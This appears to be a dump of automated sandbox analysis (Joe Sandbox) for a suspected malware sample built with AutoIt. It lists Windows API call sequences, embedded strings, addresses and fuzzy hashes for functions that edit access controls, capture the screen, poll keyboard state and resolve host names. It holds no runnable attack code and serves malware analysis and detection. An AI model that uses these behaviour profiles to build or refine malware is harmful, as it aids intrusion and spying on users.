                                                  • _memset.LIBCMT ref: 008D846D
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D848C
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D849D
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 008D84DA
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D84F6
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D8513
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8522
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008D8529
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D854A
                                                  • CopySid.ADVAPI32(00000000), ref: 008D8551
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8582
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D85A8
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D85BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 2347767575-0
                                                  • Opcode ID: 2ed83199f7706a865d0bb99278cae436641b4e4c595610b3ef91f3fe84d854d5
                                                  • Instruction ID: 1394f4c043c1f23bf4a87e07d61ea07638d899ea275ec31f9a8e6c7030f6006e
                                                  • Opcode Fuzzy Hash: 2ed83199f7706a865d0bb99278cae436641b4e4c595610b3ef91f3fe84d854d5
                                                  • Instruction Fuzzy Hash: 6961297190020AEFDF10DFA5EC45AAEBBB9FF04710F14826AE915E6291DB319A05DF60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 008F76A2
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008F76AE
                                                  • CreateCompatibleDC.GDI32(?), ref: 008F76BA
                                                  • SelectObject.GDI32(00000000,?), ref: 008F76C7
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008F771B
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008F7757
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008F777B
                                                  • SelectObject.GDI32(00000006,?), ref: 008F7783
                                                  • DeleteObject.GDI32(?), ref: 008F778C
                                                  • DeleteDC.GDI32(00000006), ref: 008F7793
                                                  • ReleaseDC.USER32(00000000,?), ref: 008F779E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: c76a7b28693de240787c0c39fcd47ac4e82c3d38452ab67c7a6803002776c6b8
                                                  • Instruction ID: 14888f5f825add8324051bba3b41573a6b0a595a3337e4e0b2c714af422b3b87
                                                  • Opcode Fuzzy Hash: c76a7b28693de240787c0c39fcd47ac4e82c3d38452ab67c7a6803002776c6b8
                                                  • Instruction Fuzzy Hash: F6513975904209EFDB25CFA8CC84EAEBBB9FF48310F14842DEA4AD7210D731A9408B60
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,0090FB78), ref: 008EA0FC
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 008EA11E
                                                  • __swprintf.LIBCMT ref: 008EA177
                                                  • __swprintf.LIBCMT ref: 008EA190
                                                  • _wprintf.LIBCMT ref: 008EA246
                                                  • _wprintf.LIBCMT ref: 008EA264
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-2391861430
                                                  • Opcode ID: a64dcb6f602c072c556e022bda0706f3a844862fa201c49a0a7cbb1543ee7b2d
                                                  • Instruction ID: c9b67160fddf37ddd7db693e265654679f8093fc0b0f48f4ff53ed539daec4a8
                                                  • Opcode Fuzzy Hash: a64dcb6f602c072c556e022bda0706f3a844862fa201c49a0a7cbb1543ee7b2d
                                                  • Instruction Fuzzy Hash: 15516B71904209AACF19FBA4CD86EEEB779FF05704F200165B515B20A1EB31AF58DB62
                                                  APIs
                                                    • Part of subcall function 008A0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00886C6C,?,00008000), ref: 008A0BB7
                                                    • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00886E5A
                                                    • Part of subcall function 008859CD: _wcscpy.LIBCMT ref: 00885A05
                                                    • Part of subcall function 008A387D: _iswctype.LIBCMT ref: 008A3885
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: 15fc59d1b3afef905913062527b98aa40e72f9f4456a05416dfb15e6c1491cbe
                                                  • Instruction ID: 583ed90971c55937dfe1563b01fd77d238c972fbfe5f63c98430beb6d33d4153
                                                  • Opcode Fuzzy Hash: 15fc59d1b3afef905913062527b98aa40e72f9f4456a05416dfb15e6c1491cbe
                                                  • Instruction Fuzzy Hash: 310234311083419EC724EF28C891AAEBBE5FF99354F14492DF596D72A2DB30DA49CB43
                                                  APIs
                                                  • _memset.LIBCMT ref: 008845F9
                                                  • GetMenuItemCount.USER32(00946890), ref: 008BD7CD
                                                  • GetMenuItemCount.USER32(00946890), ref: 008BD87D
                                                  • GetCursorPos.USER32(?), ref: 008BD8C1
                                                  • SetForegroundWindow.USER32(00000000), ref: 008BD8CA
                                                  • TrackPopupMenuEx.USER32(00946890,00000000,?,00000000,00000000,00000000), ref: 008BD8DD
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008BD8E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 2751501086-0
                                                  • Opcode ID: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                                                  • Instruction ID: 20216ce75b9bf57c0c30458220325eeb4aa9400ebb4996a8d6afe94998c6029b
                                                  • Opcode Fuzzy Hash: 78fff7dfe5440dc9916fca5abeaceba3dccad82f0eed2bcb0308b7a4eb1306c1
                                                  • Instruction Fuzzy Hash: 5171F27160421ABEFB209F15DC45FEABF69FB05368F200216F524EA2E1DBB16810DB95
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 9fb54b30ba6364fe81099df98a97f25d422b4d9d74e37ddeb464310a01315c21
                                                  • Instruction ID: 9452302e9df7bfaedb018e49adcc7c1f2ef4e1a1dadf97f472227ae63eda6097
                                                  • Opcode Fuzzy Hash: 9fb54b30ba6364fe81099df98a97f25d422b4d9d74e37ddeb464310a01315c21
                                                  • Instruction Fuzzy Hash: D5418B7110424E8FDF24EF98D991AEA3768FF26300F104514EDA19B292DB34A91ACB62
                                                  APIs
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                    • Part of subcall function 00887A84: _memmove.LIBCMT ref: 00887B0D
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008E55D2
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008E55E8
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008E55F9
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008E560B
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008E561C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: 40682b1631f49a2fcf22020cb833ed9b6a8b6ffd9b760bbe2893732fa8b2547f
                                                  • Instruction ID: 0196e7acf03e139eed939550c14f7a1bbbbaddeabc7515ea3271d77445d05ad5
                                                  • Opcode Fuzzy Hash: 40682b1631f49a2fcf22020cb833ed9b6a8b6ffd9b760bbe2893732fa8b2547f
                                                  • Instruction Fuzzy Hash: 5011C42056016979D724B6A6CC8ADFF7B7CFFE2F08F500429B445E20D1EE605E05CAA2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: 2cdae4e7502c808d528032b592f7c077495ac81a8ab6229b27c408225e030c07
                                                  • Instruction ID: 3a8266d41b5c5dbf7c444f9904627165cce231752c1a40a9bdaf5f1d2c0a2561
                                                  • Opcode Fuzzy Hash: 2cdae4e7502c808d528032b592f7c077495ac81a8ab6229b27c408225e030c07
                                                  • Instruction Fuzzy Hash: 2611D831908114AFDB30FB299C49EDB7BACFB42710F044175F449E6462EFB09A819652
                                                  APIs
                                                  • timeGetTime.WINMM ref: 008E521C
                                                    • Part of subcall function 008A0719: timeGetTime.WINMM ref: 008A071D
                                                  • Sleep.KERNEL32(0000000A), ref: 008E5248
                                                  • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 008E526C
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008E528E
                                                  • SetActiveWindow.USER32 ref: 008E52AD
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008E52BB
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 008E52DA
                                                  • Sleep.KERNEL32(000000FA), ref: 008E52E5
                                                  • IsWindow.USER32 ref: 008E52F1
                                                  • EndDialog.USER32(00000000), ref: 008E5302
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • CoInitialize.OLE32(00000000), ref: 008ED855
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008ED8E8
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 008ED8FC
                                                  • CoCreateInstance.OLE32(00912D7C,00000000,00000001,0093A89C,?), ref: 008ED948
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008ED9B7
                                                  • CoTaskMemFree.OLE32(?), ref: 008EDA0F
                                                  • _memset.LIBCMT ref: 008EDA4C
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 008EDA88
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008EDAAB
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008EDAB2
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008EDAE9
                                                  • CoUninitialize.OLE32 ref: 008EDAEB
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E05A7
                                                  • SetKeyboardState.USER32(?), ref: 008E0612
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 008E0632
                                                  • GetKeyState.USER32(000000A0), ref: 008E0649
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 008E0678
                                                  • GetKeyState.USER32(000000A1), ref: 008E0689
                                                  • GetAsyncKeyState.USER32(00000011), ref: 008E06B5
                                                  • GetKeyState.USER32(00000011), ref: 008E06C3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 008E06EC
                                                  • GetKeyState.USER32(00000012), ref: 008E06FA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 008E0723
                                                  • GetKeyState.USER32(0000005B), ref: 008E0731
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 008DC746
                                                  • GetWindowRect.USER32(00000000,?), ref: 008DC758
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 008DC7B6
                                                  • GetDlgItem.USER32(?,00000002), ref: 008DC7C1
                                                  • GetWindowRect.USER32(00000000,?), ref: 008DC7D3
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 008DC827
                                                  • GetDlgItem.USER32(?,000003E9), ref: 008DC835
                                                  • GetWindowRect.USER32(00000000,?), ref: 008DC846
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 008DC889
                                                  • GetDlgItem.USER32(?,000003EA), ref: 008DC897
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 008DC8B4
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 008DC8C1
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  APIs
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • GetSysColor.USER32(0000000F), ref: 008821D3
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 008EAB76
                                                  • GetDriveTypeW.KERNEL32(00000061,0093A620,00000061), ref: 008EAC40
                                                  • _wcscpy.LIBCMT ref: 008EAC6A
                                                  Strings
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  APIs
                                                  • _memset.LIBCMT ref: 009073D9
                                                  • CreateMenu.USER32 ref: 009073F4
                                                  • SetMenu.USER32(?,00000000), ref: 00907403
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907490
                                                  • IsMenu.USER32(?), ref: 009074A6
                                                  • CreatePopupMenu.USER32 ref: 009074B0
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009074DD
                                                  • DrawMenuBar.USER32 ref: 009074E5
                                                  Strings
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 009077CD
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 009077D4
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009077E7
                                                  • SelectObject.GDI32(00000000,00000000), ref: 009077EF
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 009077FA
                                                  • DeleteDC.GDI32(00000000), ref: 00907803
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0090780D
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00907821
                                                  • DestroyWindow.USER32(?), ref: 0090782D
                                                  Strings
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  APIs
                                                  • _memset.LIBCMT ref: 008A707B
                                                    • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                                                  • __gmtime64_s.LIBCMT ref: 008A7114
                                                  • __gmtime64_s.LIBCMT ref: 008A714A
                                                  • __gmtime64_s.LIBCMT ref: 008A7167
                                                  • __allrem.LIBCMT ref: 008A71BD
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A71D9
                                                  • __allrem.LIBCMT ref: 008A71F0
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A720E
                                                  • __allrem.LIBCMT ref: 008A7225
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A7243
                                                  • __invoke_watson.LIBCMT ref: 008A72B4
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction ID: f471124ecaf99171a2550d2bda1bdce1e35846dafc02eb41860f655ebfdb28f9
                                                  • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                  • Instruction Fuzzy Hash: F071C771A04B16ABF7149E7DCC42BAAB3A8FF12324F14423AF515E7B81E770E9409791
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2A31
                                                  • GetMenuItemInfoW.USER32(00946890,000000FF,00000000,00000030), ref: 008E2A92
                                                  • SetMenuItemInfoW.USER32(00946890,00000004,00000000,00000030), ref: 008E2AC8
                                                  • Sleep.KERNEL32(000001F4), ref: 008E2ADA
                                                  • GetMenuItemCount.USER32(?), ref: 008E2B1E
                                                  • GetMenuItemID.USER32(?,00000000), ref: 008E2B3A
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 008E2B64
                                                  • GetMenuItemID.USER32(?,?), ref: 008E2BA9
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E2BEF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C03
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C24
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
